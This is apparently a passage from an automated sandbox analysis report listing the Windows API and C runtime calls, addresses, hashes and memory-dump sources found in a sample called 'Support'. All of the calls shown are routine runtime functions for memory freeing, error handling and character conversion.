• Instruction ID: 240b4209ad8e517aeb4f7388f8827c3b12abea577fb0da9a5e505baec38b133b
• Opcode Fuzzy Hash: 3fc4dea7ee55c86967a05f5a8e67ee649e2994152e6af795facd9d92aedacf08
• Instruction Fuzzy Hash: 3D3116B5D052189BDB21DFA4D9497CEBBB8AF08304F1041AAE40CAB290EB709A84DF45
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C0466B
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C04675
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C04682
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002,00000000,?,00C03F66,00000003,00C0209F,00C01AFC), ref: 00C03698
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002,00000000,?,00C03F66,00000003,00C0209F,00C01AFC), ref: 00C0369F
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00C036B1
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C0A490,?,?,00000008,?,?,00C0A130,00000000), ref: 00C0A6C2
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C01BEA
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00C01300), ref: 00C01AB1
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00C0654B
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06095
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060A7
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060B9
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060CB
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060DD
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C060EF
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06101
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06113
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06125
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06137
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C06149
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C0615B
                                                                                                                                                                                                                                                    • Part of subcall function 00C06078: _free.LIBCMT ref: 00C0616D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06540
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06562
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06577
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06582
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065A4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065B7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065C5
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C065D0
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06608
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0660F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0662C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06644
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: 40e6aa2506e4a17ca8d3584454e534740f23193089942b1642003e80a90ac6a0
                                                                                                                                                                                                                                                  • Instruction ID: e5668d887d9f999b6849a3b93b6a533189634ff807753cc1841d1949ef1b3b9b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40e6aa2506e4a17ca8d3584454e534740f23193089942b1642003e80a90ac6a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79315EB16007049FEB64AE7AEC05B6AB3E8EF40310F148929F569D71D1DE31EEA0DB50

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04344
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04350
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0435B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04366
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04371
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0437C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04387
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04392
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0439D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C043AB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: bdbf57e9c971849f7d58e42fb52a25d13c95fa09ca9adc4a3ab5539a6f4de325
                                                                                                                                                                                                                                                  • Instruction ID: a1af8ee6f6dea262f343cb938cd2c1d30e8b2825671a86b2b06f1febe7a9f6a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdbf57e9c971849f7d58e42fb52a25d13c95fa09ca9adc4a3ab5539a6f4de325
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9117AF5600148EFCB45EF96D842CDA3B69EF44750F518555FA088F1E2D631DE50EB40

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00C054C8,00000000,?,?,?,00C07D05,?,?,00000100), ref: 00C07B0E
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C07B46
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00C07D05,?,?,00000100,5EFC4D8B,?,?), ref: 00C07B94
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C07C2B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C07C8E
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C07C9B
                                                                                                                                                                                                                                                    • Part of subcall function 00C062FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00C07E5B,?,00000000,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD), ref: 00C06331
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C07CA4
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C07CC9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2597970681-0

Control-flow Graph (graph image not preserved; first node 230 at c08417-c08474)
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00C08B8C,?,00000000,?,00000000,00000000), ref: 00C08459
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00C084D4
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00C084EF
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00C08515
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00C08B8C,00000000,?,?,?,?,?,?,?,?,?,00C08B8C,?), ref: 00C08534
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00C08B8C,00000000,?,?,?,?,?,?,?,?,?,00C08B8C,?), ref: 00C0856D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0

Control-flow Graph (graph image not preserved; first node 259 at c01e00-c01e51)
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C01E37
                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C01E3F
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C01EC8
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C01EF3
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C01F48
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373

Control-flow Graph (graph image not preserved; first node 305 at c0621b-c06226)
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00C061DF: _free.LIBCMT ref: 00C06208
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06269
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
                                                                                                                                                                                                                                                    • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C06274
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0627F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062D3
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062DE
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C062F4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0

Control-flow Graph (graph image not preserved; first node 342 at c023d1-c023d8)
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00C023C8,00C0209F,00C01AFC), ref: 00C023DF
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C023ED
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C02406
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00C023C8,00C0209F,00C01AFC), ref: 00C02458
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,00C06D69,?,?,?,00C104C8,0000002C,00C03F34,00000016,00C0209F,00C01AFC), ref: 00C04428
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C0445B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C04483
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00C04490
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00C0449C
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 00C044A2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C036AD,?,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002), ref: 00C0371C
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C0372F
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00C036AD,?,?,00C0364D,?,00C102E0,0000000C,00C037A4,?,00000002,00000000), ref: 00C03752
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00C054C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00C0639A
                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C063D2
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C06423
                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C06435
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00C0643E
                                                                                                                                                                                                                                                    • Part of subcall function 00C062FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00C07E5B,?,00000000,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD), ref: 00C06331
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C05627
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C0564A
                                                                                                                                                                                                                                                    • Part of subcall function 00C062FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00C07E5B,?,00000000,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD), ref: 00C06331
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C05670
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00C05683
                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C05692
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_c00000_Support.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2278895681-0

Control-flow Graph

control_flow_graph 447 c044a8-c044bf GetLastError 448 c044c1-c044cb call c05904 447->448 449 c044cd-c044d2 447->449 448->449 454 c0451e-c04525 SetLastError 448->454 450 c044d4 call c0480c 449->450 453 c044d9-c044df 450->453 455 c044e1 453->455 456 c044ea-c044f8 call c0595a 453->456 457 c04527-c0452c 454->457 458 c044e2-c044e8 call c04869 455->458 463 c044fa-c044fb 456->463 464 c044fd-c04513 call c04296 call c04869 456->464 465 c04515-c0451c SetLastError 458->465 463->458 464->454 464->465 465->457
APIs
• GetLastError.KERNEL32(?,?,?,00C047FE,00C07E79,?,00C0686F,?,00000004,00000000,?,?,?,00C03BCD,?,00000000), ref: 00C044AD
• _free.LIBCMT ref: 00C044E2
• _free.LIBCMT ref: 00C04509
• SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C04516
• SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C0451F
Memory Dump Source
• Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_Support.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0

Control-flow Graph

control_flow_graph 470 c06176-c06181 471 c06183-c0618b 470->471 472 c061dc-c061de 470->472 473 c06194-c0619d 471->473 474 c0618d-c06193 call c04869 471->474 476 c061a6-c061af 473->476 477 c0619f-c061a5 call c04869 473->477 474->473 478 c061b1-c061b7 call c04869 476->478 479 c061b8-c061c1 476->479 477->476 478->479 483 c061c3-c061c9 call c04869 479->483 484 c061ca-c061d3 479->484 483->484 484->472 488 c061d5-c061db call c04869 484->488 488->472
APIs
• _free.LIBCMT ref: 00C0618E
  • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
  • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
• _free.LIBCMT ref: 00C061A0
• _free.LIBCMT ref: 00C061B2
• _free.LIBCMT ref: 00C061C4
• _free.LIBCMT ref: 00C061D6
Memory Dump Source
• Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002938677.0000000000C0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002951164.0000000000C11000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2002962574.0000000000C13000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_Support.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00C03DAD
  • Part of subcall function 00C04869: HeapFree.KERNEL32(00000000,00000000,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?), ref: 00C0487F
  • Part of subcall function 00C04869: GetLastError.KERNEL32(?,?,00C0620D,?,00000000,?,00000000,?,00C06234,?,00000007,?,?,00C0669F,?,?), ref: 00C04891
• _free.LIBCMT ref: 00C03DBF
• _free.LIBCMT ref: 00C03DD2
• _free.LIBCMT ref: 00C03DE3
• _free.LIBCMT ref: 00C03DF4
Memory Dump Source
• Source File: 00000000.00000002.2002925505.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.2002913617.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
